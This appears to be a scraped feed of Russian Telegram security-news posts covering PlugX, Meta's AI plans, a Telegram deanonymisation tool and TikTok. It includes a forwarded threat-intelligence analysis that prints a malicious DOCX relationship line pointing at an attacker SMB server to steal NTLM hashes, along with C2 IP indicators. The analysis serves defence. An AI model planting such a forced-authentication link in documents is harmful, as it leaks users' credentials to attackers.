4200 компьютеров под управлением PlugX: ФБР вмешалось
👮♀️ ФБР провело специальную операцию по удалению вредоносного ПО PlugX с 4200 компьютеров в США. Вредонос использовался хакерской группой «Mustang Panda» для кражи данных и удалённого доступа к системам жертв.
🕷 Вредоносная программа распространялась через USB-накопители и действовала с 2012 года, атакуя компьютеры по всему миру. По данным ФБР, только с сентября 2023 года около 45 000 IP-адресов в США обращались к командному серверу вредоноса.
⚡️ В ходе операции ФБР использовало собственные механизмы вредоноса для его деактивации, работая совместно с французскими правоохранителями. Специальное командное сообщение заставило PlugX удалить все созданные файлы и полностью прекратить работу.
#PlugX #кибератака #ФБР #кибербезопасность
@SecLabNews
#PlugX #кибератака #ФБР #кибербезопасность
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
ФБР взломало 4200 компьютеров, чтобы уничтожить китайский вирус
Агентство атаковало сеть PlugX.
ИИ против программистов: планы Meta на 2025 год
🤖 В подкасте The Joe Rogan Experience Марк Цукерберг сообщил о разработке ИИ для замены инженеров среднего звена. «Вероятно, в 2025 году у нас в Meta*, как и у других компаний, работающих в этом направлении, появится ИИ, который фактически сможет выполнять роль инженера среднего звена и писать код», — заявил он.
💰 Текущая средняя зарплата инженеров среднего звена в Meta составляет несколько сотен тысяч долларов в год. Хотя Цукерберг не говорит напрямую о сокращении персонала, его заявление намекает на возможные изменения для разработчиков.
👀 Глава Meta отметил, что в будущем большая часть кода будет создаваться ИИ-инженерами, а не людьми. При этом он подчеркнул, что новая технология скорее дополнит специалистов, позволив им заниматься «более смелыми задачами».
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Meta #ИИ #программисты #будущее
@SecLabNews
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Meta #ИИ #программисты #будущее
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Цукерберг: ИИ заменит программистов в Meta уже в 2025 году
Глава компании рассказал о планах автоматизировать процессы разработки.
Forwarded from ESCalator
Ваш хеш, пожалуйста… Спасибо! 🙏
В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.
🆕 С2-сервер новый, подход старый
Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).
Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.
В файле присутствует обращение к SMB-ресурсу на внешнем сервере
👤 Поискав другие файлы, связанные с этим IP-адресом, мы выявили еще несколько документов-приманок для атак на организации (рисунки 3–5). Кроме того, стоит отметить важную деталь: в метаданных указано имя пользователя, создавшего или последним изменившего документ, — kib vol.
Наличие связи с внешним SMB-сервером, а также уникальные метаданные позволили зацепиться за еще один файл, который, в свою очередь, связывался с другим IP-адресом (
Просмотрев подсеть
IoCs
С2-серверы:
SHA-256:
#TI #C2 #ioc #Phishing
@ptescalator
В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.
Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).
Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.
В файле присутствует обращение к SMB-ресурсу на внешнем сервере
45.155.249.126
. Активность сервера наблюдается с ноября 2024 года, соединение происходит через механизм связей (relations) частей WordprocessingML-документа:<ns0:Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file://\\45.155.249.126\19i6LJ4qNx81SkAFg4mtUbf5.png" TargetMode="External" /></ns0:Relationships>
👤 Поискав другие файлы, связанные с этим IP-адресом, мы выявили еще несколько документов-приманок для атак на организации (рисунки 3–5). Кроме того, стоит отметить важную деталь: в метаданных указано имя пользователя, создавшего или последним изменившего документ, — kib vol.
Наличие связи с внешним SMB-сервером, а также уникальные метаданные позволили зацепиться за еще один файл, который, в свою очередь, связывался с другим IP-адресом (
31.214.157.167
) злоумышленников — АО-******- -12904ДО.docx. Этот документ был задействован в атаках с использованием Ozone RAT и Darktrack RAT, которые также описаны у нас в статье (рисунок 1).Просмотрев подсеть
31.214.157.0/24
, можно определить как минимум еще один IP-адрес, который замечен в подобных инцидентах, — 31.214.157.49
. Этот сервер задействовался в атаках как PhaseShifters (например, ГВПК ответ цифровому развитию.docx), так и UAC-0050 (с использованием домена tax-gov-ua.com
). Напомним, что сходства этих двух группировок все еще требуется тщательно исследовать.IoCs
С2-серверы:
45.155.249.126
31.214.157.167
31.214.157.49
SHA-256:
3172bf0dd76232fc633214f0ba92b25d27b136a2ed5d9e4e7d06b0686ef4d34c
3eca76737c6aee34b4c38845fde13bceed23a31d39e958893a44f42380ff84d5
fd50307b7f08d037c5d37f2505c8de6edc9c57e1843f4434309a135f4b43ff5c
5061e83a380a9c3ebe91bd5de80fe8f11b666a182efbebe13a1b0dfbc2842487
#TI #C2 #ioc #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔌 В Татарстане произошел обрыв магистрального кабеля на участке между населенными пунктами Тюлячи и Новая Тура. Это привело к деградации услуг ШПД и ухудшению качества интернет-соединения для примерно 3,8 млн пользователей в 21 регионе России.
#интернетсбой #Татарстан #РКН #цифроваяинфраструктура
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Интернет сбоит у миллионов: обрыв магистрали в Татарстане
Роскомнадзор подтвердил второй масштабный сбой за двое суток.
#SourceCraft #Яндекс #разработка #GitLab
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Российские программисты получат замену GitLab в феврале
Новая платформа Яндекса готова конкурировать с мировыми аналогами.
Telegram под наблюдением: ИИ раскрывает авторов сообщений
🔍 Российский разработчик создал обновленную версию ИИ-инструмента Apparatus Sapiens для анализа контента в Telegram. Система способна не только находить потенциально опасные сообщения, но и определять их авторов, анализируя более 22 миллионов чатов.
🤖 Инструмент использует продвинутые алгоритмы для оценки «окраса» сообщений и выявления признаков противоправной деятельности. После обнаружения подозрительного контента система может провести деанонимизацию автора, определив его геолокацию, телефонный номер и другие идентификаторы.
📊 База данных системы содержит информацию о 58 миллионах пользователей Telegram, включая их телефонные номера. В случае если точная идентификация невозможна, система выгружает полную историю сообщений пользователя, изменений его профиля и связей для последующего ручного анализа.
#ИскусственныйИнтеллект #Безопасность #Telegram #АнализДанных
@SecLabNews
#ИскусственныйИнтеллект #Безопасность #Telegram #АнализДанных
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
В России разработан ИИ для деанонимизации в мессенджерах
Технология безопасности раскрывает цифровые следы в мессенджере.
«Да кому сдалось нас атаковать?» — часто слышите такое от коллег? Споры между ИБ и IT — одна из причин, почему уязвимости остаются неустраненными.
На практикуме «Управление уязвимостями: от теории к практике» вы узнаете:
Разберите эту головоломку на практикуме и получите рабочие инструменты для ее решения.
Please open Telegram to view this post
VIEW IN TELEGRAM
#кибербезопасность #SIEM #ArcSight #OpenText
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Подрядчик Пентагона OpenText попал под запрет в России
Генпрокуратура выявила связь компании с западной пропагандой.
#кибербезопасность #MikroTik #ботнет #фишинг
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
13 000 роутеров MikroTik превращены в хакерскую сеть
Устройства компании снова в центре внимания специалистов.
#кибербезопасность #США #указБайдена #цифроваязащита
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Наследие Байдена: искусственный интеллект встанет на защиту Америки
Как изменится киберзащита США с последним указом Джо Байдена.
Прольем свет на темную сторону интернета
Дарквеб для хакеров — это не просто набор анонимных сайтов, а разветвленная экосистема, где свои правила, инструменты и экономика. Здесь продается все — от вредоносного ПО до доступа к системам, — а конкуренция может быть жестче, чем в легальном бизнесе.
На вебинаре мы впервые расскажем, как на самом деле устроен рынок киберпреступности.
Обсудим:
Ждем вас на вебинаре! Регистрация обязательна.
Please open Telegram to view this post
VIEW IN TELEGRAM
🆘 Минцифры России поддержало инициативу депутата Дмитрия Гусева о добавлении кнопки экстренной помощи на портале «Госуслуги». Новая функция будет работать по аналогии с номером «112», обеспечивая прямую связь с экстренными службами.
🔄 В Курской области уже были апробированы сервисы для чрезвычайных ситуаций, включая поиск пропавших и запрос эвакуации. Этот опыт ляжет в основу типового решения для всех регионов России.
⚡️Для реализации проекта потребуется модернизация информационных систем МЧС, МВД, ФСБ, Росгвардии и Минздрава. Также будут разработаны специальные алгоритмы действий для каждого ведомства при получении сигналов через новую систему.
#Госуслуги #Безопасность #ЦифровизацияРоссии #ЭкстреннаяПомощь
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Цифровой спасатель: на Госуслугах появится экстренная кнопка
Проект требует тестирования и координации с МЧС, МВД и другими ведомствами.
Когда богатые спасают интернет от ещё более богатых, это похоже на сюжет из антиутопии. Но вдруг они на этот раз действительно перепишут правила игры?
#интернет #технологии #соцсети #FreeOurFeeds @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
FreeOurFeeds: знаменитости объединились против диктатуры миллиардеров в соцсетях
Создатель Википедии и голливудские звезды запускают свободную альтернативу Twitter.
📉 США официально заблокировали TikTok, назвав его угрозой безопасности. Верховный суд поддержал решение, вызвавшее волну протестов, особенно среди молодых пользователей.
💡 TikTok изменил моду, музыку, еду и образование. Алгоритмы платформы подстроились под вкусы миллионов, создавая тренды и культурные феномены.
🔐 Цензура вместо свободы слова? Запрет вызвал вопросы о демократических принципах, ведь TikTok был не только площадкой для развлечений, но и для выражения идей.
В попытке защититься от "китайской угрозы" США невольно позаимствовали любимый метод Поднебесной - просто взять и запретить все, что кажется подозрительным.
#TikTok #конфиденциальность #нацбезопасность #цифроваяэтика @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
TikTok мертв: США потеряли главную платформу поколения Z
Пользователи переходят на новые платформы из чувства бунта.